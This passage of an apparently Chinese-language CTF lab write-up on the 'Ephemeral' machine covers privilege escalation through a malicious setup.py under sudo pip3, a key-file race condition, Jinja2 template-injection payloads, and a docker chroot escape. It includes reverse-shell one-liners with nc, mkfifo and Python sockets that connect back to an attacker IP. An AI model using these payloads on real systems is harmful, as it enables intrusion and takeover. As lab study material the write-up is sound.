-d)\nkevin@ephemeral:~$ echo &quot;import os; os.execl(&#039;\/bin\/sh&#039;, &#039;sh&#039;, &#039;-c&#039;, &#039;sh &lt;$(tty) &gt;$(tty) 2&gt;$(tty)&#039;)&quot; &gt; $TF\/setup.py\nkevin@ephemeral:~$ sudo -l\nMatching Defaults entries for kevin on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser kevin may run the following commands on ephemeral:\n    (donald) PASSWD: \/usr\/bin\/pip3 install *\nkevin@ephemeral:~$ sudo -u donald \/usr\/bin\/pip3 install $TF\nERROR: Directory &#039;\/tmp\/tmp.7PN4bblEXQ&#039; is not installable. Neither &#039;setup.py&#039; nor &#039;pyproject.toml&#039; found.\nkevin@ephemeral:\/tmp\/tmp.7PN4bblEXQ$ ls -la\ntotal 12\ndrwx------ 2 kevin kevin 4096 Apr 30 01:59 .\ndrwxrwxrwt 3 root  root  4096 Apr 30 01:59 ..\n-rw-rw-r-- 1 kevin kevin   86 Apr 30 01:59 setup.py<\/code><\/pre>\n<p>wtf\uff1f\u5c1d\u8bd5\u4e00\u4e0b\u53cd\u5f39shell\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">kevin@ephemeral:\/tmp$ echo &#039;import os,pty,socket;s=socket.socket();s.connect((&quot;192.168.0.143&quot;,2345));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(&quot;bash&quot;)&#039; &gt; exp\/setup.py\nkevin@ephemeral:\/tmp$ chmod +x exp\/setup.py \nkevin@ephemeral:\/tmp$ sudo -u donald \/usr\/bin\/pip3 install \/tmp\/exp\/\nProcessing .\/exp<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740600.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430161442176\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>donald-&gt;jane<\/h3>\n<pre><code class=\"language-bash\">(remote) donald@ephemeral:\/tmp\/pip-req-build-zwnyglvc$ cd \/home\/donald\/\n(remote) donald@ephemeral:\/home\/donald$ ls -la\ntotal 216\ndrwx------ 8 donald donald   4096 Mar 17  2022 .\ndrwxr-xr-x 6 root   root     4096 Mar 15  2022 ..\n-rw------- 1 donald donald 158122 Mar 17  2022 .bash_history\n-rw-r--r-- 1 donald donald    220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 donald donald   3771 Feb 25  2020 .bashrc\ndrwx------ 4 donald donald   4096 Mar 15  2022 .cache\ndrwxr-xr-x 2 root   root     4096 Mar 15  2022 commands\ndrwx------ 4 donald donald   4096 Mar 15  2022 .config\ndrwxrwxr-x 2 donald donald   4096 Mar 16  2022 Desktop\ndrwxr-xr-x 3 donald donald   4096 Mar 15  2022 .local\n-rw-rw-r-- 1 donald donald     28 Mar 16  2022 mypass.txt\n-rw-r--r-- 1 donald donald    178 Mar 16  2022 note.txt\n-rwxr-xr-x 1 root   root      891 Mar 15  2022 .profile\n-rw------- 1 donald donald     33 Mar 15  2022 .python_history\ndrwx------ 2 donald donald   4096 Mar 16  2022 .ssh\n-rw-rw-r-- 1 donald donald    173 Mar 16  2022 .wget-hsts\n(remote) donald@ephemeral:\/home\/donald$ cat *.txt\nFjqSy9KKWgSdc65usJ7yoPNIokz\nHey Donald this is your system administrator. I left your new password in your home directory. 
\nJust remember to decode it.\n\nLet me know if you need your password changed again.\n(remote) donald@ephemeral:\/home\/donald$ cat .bash_history <\/code><\/pre>\n<p>\u5728\u5386\u53f2\u6587\u4ef6\u4e2d\u53d1\u73b0\u5f88\u591a\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">wget https:\/\/www.exploit-db.com\/raw\/41154 -O exploit.c\nls -la \ngcc exploit.c -o exploit\nls -la \nclear\nls -la \nrm -r exploit.c \nclear<\/code><\/pre>\n<pre><code class=\"language-bash\">sudo -u jane \/usr\/local\/bin\/addKeys.sh\ncd ..\nls -la \ncd keys\/\nls -la ~\nsudo -u jane \/usr\/local\/bin\/addKeys.sh\nls -l \/home\/jane\/\ncd<\/code><\/pre>\n<pre><code class=\"language-bash\">ssh jane@10.0.0.179\nexit\nssh donald@10.0.0.179 -t &quot;bash --noprofile&quot;\nexit \nclear<\/code><\/pre>\n<p>\u611f\u89c9\u50cf\u662f\u4f5c\u8005\u65e0\u5fc3\u4e4b\u5931\uff0c\u63a5\u7740\u6309\u6211\u4eec\u7684\u65b9\u6cd5\u5c1d\u8bd5\u8fdb\u884c\u89e3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430162116128\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">nORMAniAntIcINacKLAi<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) donald@ephemeral:\/home\/donald$ sudo -l\n[sudo] password for donald: \nMatching Defaults entries for donald 
on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser donald may run the following commands on ephemeral:\n    (jane) PASSWD: \/usr\/local\/bin\/addKeys.sh\n(remote) donald@ephemeral:\/home\/donald$ cat \/usr\/local\/bin\/addKeys.sh\n#!\/bin\/bash\n\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa.pub\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa\n\n\/usr\/bin\/ssh-keygen -q -t rsa -N &#039;&#039; -f \/dev\/shm\/id_rsa\n\n\/bin\/echo &quot;Keys Added!&quot;\n\n\/usr\/bin\/rm -rf \/home\/jane\/.ssh\/\n\n\/bin\/echo &quot;Directory Deleted!&quot;\n\n\/usr\/bin\/mkdir \/home\/jane\/.ssh\/\n\n\/bin\/echo &quot;.ssh Directory Created!&quot;\n\n\/usr\/bin\/cp \/dev\/shm\/id_rsa.pub \/home\/jane\/.ssh\/authorized_keys\n\n\/bin\/echo &quot;Keys Copied.&quot;\n\n\/usr\/bin\/chmod 600 \/home\/jane\/.ssh\/authorized_keys\n\n\/bin\/echo &quot;Permissions Changed!&quot;\n\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa\n\/usr\/bin\/rm -rf \/dev\/shm\/id_rsa.pub \n\n\/bin\/echo &quot;Keys Removed!&quot;\n<\/code><\/pre>\n<p>\u8fd9\u4e2a\u811a\u672c\u90fd\u662f\u7edd\u5bf9\u8def\u5f84\uff0c\u5229\u7528\u4e0d\u4e86\uff0c\u89c1\u7f1d\u63d2\u9488\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) donald@ephemeral:\/dev\/shm$ ls -la\ntotal 0\ndrwxrwxrwx  2 root root   40 Apr 30  2024 .\ndrwxr-xr-x 19 root root 3980 Apr 29 23:57 ..<\/code><\/pre>\n<p>\u6743\u9650\u8f83\u9ad8\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ ssh donald@192.168.0.148                                      \nThe authenticity of host &#039;192.168.0.148 (192.168.0.148)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:Lsf\/x4H3iybf7oKWrpIkzv3slmryI1uJdNMK6\/3BVwg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting 
(yes\/no\/[fingerprint])? yesWarning: Permanently added &#039;192.168.0.148&#039; (ED25519) to the list of known hosts.\ndonald@192.168.0.148&#039;s password: \nWelcome to Ubuntu 20.04.4 LTS (GNU\/Linux 5.17.0-051700rc7-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n17 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release &#039;22.04.3 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nYour Hardware Enablement Stack (HWE) is supported until April 2025.\nLast login: Tue Apr 30 02:40:05 2024 from 192.168.0.143\ndonald@ephemeral:~$ clear\n-rbash: \/usr\/lib\/command-not-found: restricted: cannot specify `\/&#039; in command names\ndonald@ephemeral:~$ exit\nlogout\n-rbash: \/usr\/bin\/clear_console: restricted: cannot specify `\/&#039; in command names\nConnection to 192.168.0.148 closed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ ssh donald@192.168.0.148 -t &quot;bash --noprofile&quot;\ndonald@192.168.0.148&#039;s password: \ndonald@ephemeral:~$ whoami;id\ndonald\nuid=1004(donald) gid=1004(donald) groups=1004(donald)<\/code><\/pre>\n<blockquote>\n<p><strong>--noprofile<\/strong>: 
\u8fd9\u662f<code>bash<\/code>\u7684\u4e00\u4e2a\u9009\u9879\uff0c\u7528\u4e8e\u544a\u8bc9<code>bash<\/code>\u4e0d\u8981\u8bfb\u53d6<code>~\/.bash_profile<\/code>\u3001<code>~\/.bash_login<\/code>\u3001<code>~\/.profile<\/code>\u7b49\u521d\u59cb\u5316\u6587\u4ef6\u3002\u8fd9\u53ef\u4ee5\u52a0\u901f\u542f\u52a8\u901f\u5ea6\uff0c\u7279\u522b\u662f\u5f53\u8fd9\u4e9b\u6587\u4ef6\u4e2d\u6709\u8bb8\u591a\u590d\u6742\u7684\u547d\u4ee4\u6216\u811a\u672c\u65f6\u3002\u901a\u5e38\uff0c\u8fd9\u4e9b\u521d\u59cb\u5316\u6587\u4ef6\u7528\u4e8e\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\u3001\u522b\u540d\u3001\u51fd\u6570\u7b49\u3002<\/p>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7ade\u4e89\uff1a<\/p>\n<pre><code class=\"language-bash\">donald@ephemeral:\/dev\/shm$ \/usr\/bin\/ssh-keygen -q -t rsa -N &#039;&#039; -f \/dev\/shm\/jane\ndonald@ephemeral:\/dev\/shm$ ls -la\ntotal 8\ndrwxrwxrwx  2 root   root     80 Apr 30 03:01 .\ndrwxr-xr-x 19 root   root   3980 Apr 29 23:57 ..\n-rw-------  1 donald donald 2602 Apr 30 03:01 jane\n-rw-r--r--  1 donald donald  570 Apr 30 03:01 jane.pub\ndonald@ephemeral:\/dev\/shm$ while true; do cp \/dev\/shm\/jane \/dev\/shm\/id_rsa; chmod 777 \/dev\/shm\/id_rsa; cp \/dev\/shm\/jane.pub \/dev\/shm\/id_rsa.pub; done<\/code><\/pre>\n<pre><code class=\"language-bash\">donald@ephemeral:~$ sudo -u jane \/usr\/local\/bin\/addKeys.sh \n\/dev\/shm\/id_rsa already exists.\nOverwrite (y\/n)? 
n\nKeys Added!\nDirectory Deleted!\n.ssh Directory Created!\nKeys Copied.\nPermissions Changed!\nKeys Removed!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740602.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740602.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430170318058\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740603.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740603.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430170535474\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>jane-&gt;randy<\/h3>\n<p>\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">jane@ephemeral:~$ ls -la\ntotal 40\ndrwx------ 7 jane jane 4096 Apr 30 03:03 .\ndrwxr-xr-x 6 root root 4096 Mar 15  2022 ..\nlrwxrwxrwx 1 root root    9 Mar 15  2022 .bash_history -&gt; 
\/dev\/null\n-rw-r--r-- 1 jane jane  220 Mar 15  2022 .bash_logout\n-rw-r--r-- 1 jane jane 3771 Mar 15  2022 .bashrc\ndrwx------ 4 jane jane 4096 Mar 16  2022 .cache\ndrwx------ 4 jane jane 4096 Mar 16  2022 .config\ndrwxrwxr-x 2 jane jane 4096 Mar 17  2022 Desktop\ndrwxrwxr-x 4 jane jane 4096 Mar 17  2022 .local\n-rw-r--r-- 1 jane jane  807 Mar 15  2022 .profile\ndrwxrwxr-x 2 jane jane 4096 Apr 30 03:03 .ssh\njane@ephemeral:~$ cd Desktop\/\njane@ephemeral:~\/Desktop$ ls -la\ntotal 8\ndrwxrwxr-x 2 jane jane 4096 Mar 17  2022 .\ndrwx------ 7 jane jane 4096 Apr 30 03:03 ..\njane@ephemeral:~\/Desktop$ sudo -l\nMatching Defaults entries for jane on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser jane may run the following commands on ephemeral:\n    (randy) NOPASSWD: \/usr\/bin\/python3 \/var\/www\/html\/private_html\/app.py\njane@ephemeral:~\/Desktop$ cat \/var\/www\/html\/private_html\/app.py\nfrom flask import Flask, request\nfrom jinja2 import Environment\n\napp = Flask(__name__)\nJinja2 = Environment()\n\n@app.route(&quot;\/page&quot;)\ndef page():\n\n    name = request.values.get(&#039;name&#039;)\n\n    output = Jinja2.from_string(&#039;Welcome &#039; + name + &#039;!&#039;).render()\n\n    return output\n\nif __name__ == &quot;__main__&quot;:\n    app.run(host=&#039;0.0.0.0&#039;, port=5000)<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728<code>SSTI<\/code>\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u7a97\u53e3\u8fd0\u884c\uff0c\u4e00\u4e2a\u7a97\u53e3\u5c1d\u8bd5\u5404\u79cd\u8d1f\u8f7d\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740604.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740604.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430171144673\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740605.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740605.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430171729001\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\uff0c\u7ee7\u7eed\u5c1d\u8bd5\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#jinja2-python\">https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#jinja2-python<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/Server%20Side%20Template%20Injection#jinja2---forcing-output-on-blind-rce\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/Server%20Side%20Template%20Injection#jinja2---forcing-output-on-blind-rce<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">{{ 
joiner.__init__.__globals__.os.popen(&#039;id&#039;).read() }}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740606.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740606.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430172119959\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen(&#039;busybox nc -e \/bin\/bash 192.168.0.143 1234&#039;).read() }}\nhttp:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen(&#039;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 192.168.0.143 1234 &gt;\/tmp\/f&#039;).read() }}\nhttp:\/\/192.168.0.148:5000\/page?name={{ joiner.__init__.__globals__.os.popen(&#039;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;%261|nc 192.168.0.143 1234 &gt;\/tmp\/f&#039;).read() }}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740607.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740607.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430173739191\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>randy-&gt;root<\/h3>\n<p>\u7528\u6237\u5c5e\u4e8e<code>docker<\/code>\u7ec4\uff0c\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/docker\/#shell\">https:\/\/gtfobins.github.io\/gtfobins\/docker\/#shell<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740608.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740608.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430173900132\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) randy@ephemeral:\/home\/jane$ docker run -v \/:\/mnt --rm -it alpine chroot \/mnt sh\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4,6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)\n# cd \/root\n# ls -la\ntotal 40\ndrwx------  4 root root 4096 Mar 18  2022 .\ndrwxr-xr-x 21 root root 4096 Mar 17  2022 ..\nlrwxrwxrwx  1 root root    9 Mar 15  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwx------  3 root root 4096 Mar 17  2022 .cache\ndrwxr-xr-x  3 root root 4096 Mar 15  2022 
.local\n-rw-------  1 root root 3672 Mar 16  2022 .mysql_history\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r--r--  1 root root   66 Mar 16  2022 .selected_editor\n-rw-r--r--  1 root root  247 Mar 16  2022 .wget-hsts\n-rw-r--r--  1 root root   33 Mar 17  2022 root.txt<\/code><\/pre>\n<p>\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ephemeral \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral] \u2514 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-667","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=667"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667\/revisions"}],"predecessor-version":[{"id":668,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/667\/revisions\/668"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=667"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?pos
t=667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}